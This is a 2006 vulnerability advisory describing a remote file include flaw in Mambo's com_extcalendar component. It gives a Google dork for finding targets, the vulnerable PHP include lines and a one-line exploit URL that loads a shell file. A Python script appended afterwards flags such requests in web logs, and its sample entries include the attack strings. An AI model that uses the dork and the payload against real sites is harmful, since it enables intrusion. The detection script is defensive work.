Computer Security
[EN] securityvulns.ru

From: crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date: 17.08.2006
Subject: com_extcalendar(extcalendar.php) Remote File Include Vulnerabilities

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------


Title : com_extcalendar(extcalendar.php) Remote File Include Vulnerabilities

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------


Google Dorks  : inurl:"/com_extcalendar/"

--------------------------------------------------------------------------------

Application :  com_extcalendar Component of Mambo

--------------------------------------------------------------------------------


--------------------------------------------------------------------------------

Bug

in extcalendar.php
--
global $mosConfig_absolute_path;
require_once( $mosConfig_absolute_path."/components/com_extcalendar/config.inc.php" );
require_once( $CONFIG_EXT['LIB_DIR']."mail.inc.php" );
--
--------------------------------------------------------------------------------


Exploit:

http://[target]/[mambo_path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=Shell.txt?

--------------------------------------------------------------------------------


greets:

X_ALPEREN_X,Root_MOr And All Other Friends

--------------------------------------------------------------------------------




--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
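
A log triage check for the request shown under "Exploit:" above, added here as an example and not part of the original advisory: a legitimate visitor never supplies mosConfig_absolute_path, so any request that sets it is worth reviewing. The log format (Apache/nginx "combined"), the sample entries, the addresses and the host name are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "mosConfig_absolute_path"   # variable named in the advisory
COMPONENT = "/components/com_extcalendar/extcalendar.php"
# Request line and status from an Apache/nginx "combined" log entry (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

# Constructed sample entries (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Aug/2006:10:12:01 +0000] "GET /mambo/components/com_extcalendar/'
    'extcalendar.php?mosConfig_absolute_path=Shell.txt? HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [17/Aug/2006:10:12:09 +0000] "GET /mambo/index.php?'
    'option=com_extcalendar&Itemid=5 HTTP/1.1" 200 8841 "-" "-"',
    '203.0.113.7 - - [17/Aug/2006:10:13:40 +0000] "GET /components/com_extcalendar/'
    'extcalendar.php?mosConfig%5Fabsolute%5Fpath=http%3A%2F%2Fhost.invalid%2Fx.txt%3F '
    'HTTP/1.0" 404 210 "-" "-"',
]

def triage(line):
    """Return a finding for a request that sets PARAM in its query string, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # parse_qsl percent-decodes names and values, so encoded spellings still match.
    values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True) if k == PARAM]
    if not values:
        return None
    path = unquote(parts.path)
    return {
        "client": m["client"],
        "status": int(m["status"]),
        "path": path,
        "value": values[-1],
        "known_component": path.endswith(COMPONENT),        # the file from the advisory
        "remote_value": bool(SCHEME_RE.match(values[-1])),  # value carries a URL scheme
    }

def scan(lines):
    """Triage every line and keep only the findings."""
    return [f for f in map(triage, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only query-string parameters reach an access log, so the same variable sent in a POST body or cookie will not appear in this output.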

